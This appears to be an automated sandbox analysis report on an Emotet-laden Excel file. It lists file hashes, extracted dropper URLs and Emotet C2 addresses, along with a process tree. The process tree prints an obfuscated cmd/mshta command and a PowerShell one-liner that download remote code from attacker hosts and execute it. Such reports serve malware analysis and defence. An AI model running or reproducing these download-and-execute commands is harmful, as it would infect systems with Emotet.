Analysis

  • max time kernel
    151s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    21-01-2022 13:00

General

  • Target

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls

  • Size

    71KB

  • MD5

    21fc12ef8a4a4ba5b38a303fa7e70c08

  • SHA1

    5700a2231371b289eae19ce62e1a73457ee582c4

  • SHA256

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5

  • SHA512

    8200f14c0a8023bb74b39796f7859258ef67a21a5f81704f82315695409795fe724ac8ca81513a95d50d169c824532e43865846ce42b0e541366309ace849654

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1412
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1132
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:324
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1952
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zyoff\hhlpk.lvh",VGXDqNqIgtoOxhe
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1160
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zyoff\hhlpk.lvh",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1164

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • \Users\Public\Documents\ssd.dll
    MD5

    bc84a5d06f2fafcca4619731bf2bb603

    SHA1

    dd1720cb36ec979a3a6b436e07749e9b94d93bb3

    SHA256

    cbc32cf0dc7689cf272ac3b9ad06da448bee58f997d61c10031e3c4615ba85c7

    SHA512

    69fe537ecd580b75c7a1be260821fb130e5d1560a09f855fa7b76928080cb851b9b6682521875b9d5e242cb7616f1d706968666076c7a244cc87db382bf27582

  • memory/324-71-0x0000000000230000-0x0000000000256000-memory.dmp
    Filesize

    152KB

  • memory/1160-91-0x0000000000210000-0x0000000000236000-memory.dmp
    Filesize

    152KB

  • memory/1164-94-0x0000000000240000-0x0000000000266000-memory.dmp
    Filesize

    152KB

  • memory/1164-96-0x0000000000500000-0x0000000000526000-memory.dmp
    Filesize

    152KB

  • memory/1164-102-0x0000000002380000-0x00000000023A6000-memory.dmp
    Filesize

    152KB

  • memory/1164-100-0x0000000000A80000-0x0000000000AA6000-memory.dmp
    Filesize

    152KB

  • memory/1164-98-0x00000000009C0000-0x00000000009E6000-memory.dmp
    Filesize

    152KB

  • memory/1608-63-0x00000000025F0000-0x000000000323A000-memory.dmp
    Filesize

    12.3MB

  • memory/1608-64-0x00000000025F0000-0x000000000323A000-memory.dmp
    Filesize

    12.3MB

  • memory/1616-57-0x0000000075F81000-0x0000000075F83000-memory.dmp
    Filesize

    8KB

  • memory/1616-54-0x000000002FB81000-0x000000002FB84000-memory.dmp
    Filesize

    12KB

  • memory/1616-55-0x0000000071551000-0x0000000071553000-memory.dmp
    Filesize

    8KB

  • memory/1616-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1616-122-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1952-78-0x0000000000290000-0x00000000002B6000-memory.dmp
    Filesize

    152KB

  • memory/1952-89-0x00000000027F0000-0x0000000002816000-memory.dmp
    Filesize

    152KB

  • memory/1952-84-0x0000000000670000-0x0000000000696000-memory.dmp
    Filesize

    152KB

  • memory/1952-82-0x00000000004D0000-0x00000000004F6000-memory.dmp
    Filesize

    152KB

  • memory/1952-80-0x0000000000470000-0x0000000000496000-memory.dmp
    Filesize

    152KB